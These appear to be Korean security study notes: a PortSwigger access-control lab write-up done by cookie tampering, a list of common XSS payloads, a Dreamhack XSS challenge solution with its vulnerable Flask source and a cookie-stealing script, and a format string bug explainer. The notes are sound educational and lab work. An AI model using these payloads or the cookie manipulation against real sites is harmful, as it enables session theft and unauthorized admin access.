• Botnet Detection: GAN을 사용해 정상적인 네트워크 트래픽과 봇넷 트래픽 간의 차이를 학습하고, 이를 통해 새로운 봇넷 공격을 탐지할 수 있는 방법이 제시된다.
• Mobile & Network Intrusion Detection: 모바일 기기와 네트워크에서 발생하는 비정상적인 활동을 탐지하는 데 GAN을 사용할 수 있으며, 특히 비정상적 네트워크 활동을 모델링해 이를 통해 공격을 탐지할 수 있다.
• Malware Generation and Detection: GAN을 사용해 새로운 악성 코드를 생성하고 이를 통해 탐지 시스템의 성능을 개선할 수 있습니다.

8. Conclusion

• GANs가 사이버 보안에서 가지는 잠재력이 있으며, 보안 문제를 해결하는 데 중요한 도구로 자리잡을 가능성이 매운 높다. 그러나 이 기술이 악용될 가능성도 있으므로 이에 대한 GAN의 안정성과 신뢰성을 높이는 연구가 필요하며, 보다 효과적인 데이터 생성 및 보안 위협 탐지 방법에 대한 연구가 지속적으로 이루어져야 한다고 강조.

1. Write-Up 작성

Lab: User role controlled by request parameter

문제의 목표는 /admin 경로에 있는 관리자 패널에 접근하여 사용자 carlos를 삭제하는 것입니다.

우선 My account에 가서 문제에 나와있는 wiener:peter로 로그인을 해보고 /admin 경로로 가봤는데 admin 페이지에 접근할 수 없었습니다.

개발자 도구를 이용해 쿠키를 분석해 보니 admin 값이 false로 되어있었고 이를 true 값으로 바꿨습니다.

값을 true로 바꾸고 새로고침을 하니 Admin panel로 바뀌었습니다.

그다음 /admin 경로로 이동한 뒤 사용자 carlos를 삭제를 해줌으로써 문제를 해결했습니다!

2. xss 공격에 많이 쓰이는 공격 구문 조사

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45

<script>alert('XSS');</script>

• <script> 태그는 HTML 문서 내에서 자바스크립을 삽입하기 위한 태그
• 이 구문이 실행되면, 브라우저에서 alert() 함수가 호출되어 "XSS"라는 팝업 창이 뜨게 된다.
• 브라우저가 HTML 코드를 파싱 할 때, <script> 태그 내의 자바스크립트를 실행한다. 이때 삽입된 악성 스크립트가 실행되면서 공격이 발생하게 된다.
• 간단한 경고 창을 띄우는 스크립트로 보이지만, 실질적인 공격에서는 악성 코드나 크롬 확장 프로그램 설치 유도, 사용자 세션 탈취 등 심각한 공격으로 확장될 수 있다.

<img src="#" onerror="alert('XSS')">

• <img> 태그는 웹 페이지에 이미지를 삽입하기 위한 태그
• onerror는 이미지가 로드되지 않거나 에러가 발생했을 때 실행되는 이벤트
• 이 구문에서는 존재하지 않는 이미지를 로드하려다 에러가 발생하면, alert('XSS')가 실행된다.
• 이미지 로딩이 실패한 경우(ex. 잘못된 경로, 파일이 없는 경우 등), onerror 이벤트 핸들러 내에 삽입된 자바스크립트가 실행된다. 공격자는 이런 방식을 이용해 악성 스크립트를 웹 페이지에 삽입할 수 있다.
• 이 방식은 사용자 입력에 대한 검증이 제대로 이루어지지 않는 웹 페이지에서 자주 발생한다.

<a href="javascript:alert('XSS')">Click me</a>

• 이 구문은 HTML의 <a> 태그를 사용하여 링크를 만들지만, 일반적인 URL 대신 javascript: 프로토콜을 사용하여 링크가 클릭될 때 자바스크립트를 실행한다. 이 구문을 클릭하면 alert('XSS')가 실행된다.
• javascript: 프로토콜은 URL의 일부토 자바스크립트를 직접 실행할 수 있게 한다.
• 공격자는 이를 이용해 악성 자바스크립트를 숨겨놓고, 사용자가 링크를 클릭하도록 유도하여 스크립트가 실행되도록 만든다.

<input onfocus="alert(document.cookie)">

• 이 구문은 HTML 입력 필드에서 자바스크립트를 실행하기 위한 DOM 이벤트 핸들러를 사용하는 방법이다.
• onfocus는 사용자가 입력 필드를 클릭하거나 포커스를 맞출 때 발생하는 이벤트이다.
• 이 구문은 입력 필드를 클릭하면 document.cookie 값을 알림으로 표시하게 된다.
• DOM 기반 XSS는 웹 페이지의 DOM(Document Object Model)을 통해 직접 자바스크립트를 실행하는 방식이다.
• 공격자는 이런 이벤트 핸들러를 통해 브라우저에서 자주 사용하는 데이터(ex. 쿠키, 세션 ID)를 훔칠 수 있게 된다.

<iframe src="javascript:alert('XSS')"></iframe>

• <iframe> 태그는 웹 페이지 안에 또 다른 웹 페이지를 삽입할 수 있는 HTML 태그이다.
• 이 구문에서는 src 속성에 javascript: 프로콜을 사용하여 자바스크립트를 실행하도록 설정되어 있다.
• iframe 태그는 일반적으로 외부 콘텐츠를 불러오는 용도로 사용된다.
• 하지만, 공격자는 javascript: 프로토콜을 통해 스크립트를 실행할 수 있으며, 웹 페이지 내에 악성 스크립트를 숨겨 실행하도록 할 수 있다.

3. Write-Up 작성하기

https://dreamhack.io/wargame/challenges/28

#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open("./flag.txt", "r").read()
except:
    FLAG = "[**FLAG**]"


def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True


def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param


@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'


memo_text = ""


@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)


app.run(host="0.0.0.0", port=8000)

문제 분석

/flag 페이지

• /flag 페이지에서 값을 입력해 POST 요청을 보내면, 입력된 값이 param 변수로 설정됩니다.
• 이후, 이 param 값과 쿠키가 담긴 flag 값이 check_xss 함수로 전달됩니다.

def check_xss(param, cookie={"name": "name", "value": "value"}): 
	url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}" 
    return read_url(url, cookie)

• check_xss 함수는 입력된 param 값을 http://127.0.0.1:8000/vuln?param=[입력된 값] URL에 삽입하고, 쿠키에는 플래그가 포함된 cookie 값을 전달합니다.
• 이 URL을 read_url 함수에 넘겨, 브라우저가 해당 URL을 로드하도록 하는데, 이때 플래그가 쿠키로 설정됩니다.

read_url 함수

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    driver.get("http://127.0.0.1:8000/")
    driver.add_cookie(cookie)
    driver.get(url)

• 이 함수는 로컬 호스트에 접속한 뒤, 플래그를 담은 쿠키를 설정하고, /vuln 페이지로 접속합니다.
• 결과적으로, 쿠키 값이 플래그를 포함하게 됩니다.

/vuln 페이지

• /vuln 페이지는 전달된 param 값을 그대로 반환하는데, 여기서 입력된 값이 웹 페이지에 그대로 출력되기 때문에 XSS 취약점이 존재합니다.
• 즉, 사용자가 자바스크립트 코드를 입력하면 이 코드가 실행될 수 있습니다.

/memo 페이지

• /memo?memo=값의 형태로 접근하면, memo에 전달된 값이 웹 페이지에 그대로 표시됩니다.
• 이 페이지를 통해 쿠키 값을 출력할 수 있습니다.

목표는 /flag 페이지에 값을 입력해 XSS 공격을 실행하고, 플래그가 담긴 쿠키를 /memo 페이지를 통해 출력하는 것입니다. 이를 위해, XSS 스크립트를 /vuln?param= 뒤에 입력해 실행해야 합니다.

<script>
    location.href="http://127.0.0.1:8000/memo?memo=" + document.cookie;
</script>

이 스크립트는 실행되면 document.cookie (현재 페이지의 쿠키, 즉 플래그가 포함된 쿠키)를 읽고, 이를 /memo 페이지로 전달하여 해당 값을 출력하게 될 것이다.

제출을 하고 memo 페이지에 가면 플래그를 획득할 수 있게 된다.

문제 해결 요약

1. /flag 페이지에서 값을 입력하면, 이 값이 /vuln?param=입력한 값 URL로 전달됩니다.
2. /vuln 페이지는 param 값을 그대로 출력하기 때문에, XSS 취약점이 존재합니다.
3. XSS 공격을 통해, 악성 자바스크립트를 실행하여 쿠키(플래그)를 탈취할 수 있습니다.
4. 자바스크립트를 이용해 document.cookie 값을 /memo 페이지로 전달하면, 플래그를 출력할 수 있습니다.

1. 포맷 스트링 버그란?

포맷 스트링 버그는 포맷 문자열(format string)을 적절하게 처리 하지 않았을 때 발생하는 보안 취약점. C언어와 같은 언어에서 printf와 같은 함수에서 자주 발생한다.

일반적으로 printf 함수는 포맷 지정자와 값을 함께 전달받아야 한다.
예를 들어, printf(“%s”, str);는 문자열 str을 출력할 때사용되며,
포맷 지정자인 %s가 입력으로 전달된 문자열을 출력하는 역할을 한다.
하지만, 만약 printf에 포맷 문자열을 주지 않고 사용자 입력을 그대로 전달하면, 포맷 스트링 버그가 발생할 수 있다.

printf(str);

이 코드는 printf(“%s”, str); 처럼 포맷 지정자를 사용한 것이 아니라, 포맷 문자열로서 직접 str이 들어가게 된다.
만약 사용자 입력에 %x 같은 포맷 지정자를 포함시킨다면, 메모리에서 데이터가 읽히거나 심지어 수정될 수 있다.

2. 포맷 스트링 버그의 위험성

• 정보 유출: 메모리의 특정 값을 %x와 같은 포맷 지정자를 통해 출력할 수 있어, 중요한 정보가 유출될 수 있다.
• 코드 실행: 잘못된 포맷 문자열이 입력되면, 공격자가 시스템에 악의적인 코드를 주입하여 실행할 수 있다.

3. 퀴즈 7번 문제 분석

#include <stdio.h>

int main() {
	char str[100];
	scanf(“%s”, str);
	printf(str);

	return 0;
}

위 코드에서 포맷 스트링 버그를 일으키기 위한 페이로드를 작성해보세요,
(문자열은 “Hello!!로 통일)

• printf(str);에서 포맷 문자열이 제공되지 않고, 사용자로부터 입력받은 문자열 str이 그대로 사용되고 있다.
• 취약점: 사용자가 %x 또는 %s 같은 포맷 지정자를 포함한 문자열을 입력하면, 원하지 않는 메모리 값이 출력되거나 더 심각한 경우 메모리 변조가 발생할 수 있다.
• 답: Hello!%x
• 여기서 %x는 메모리 상의 특정 값을 16진수로 출력하게 만든다.
• 포맷 스트링 버그를 방지하기 위해서는 포맷 문자열을 명시적으로 지정해야 한다.

printf(“%s”, str);
// 이렇게 하면 printf는 항상 str을 문자열로 출력하게 되어, 포맷 스트링 버그가 발생하지 않는다.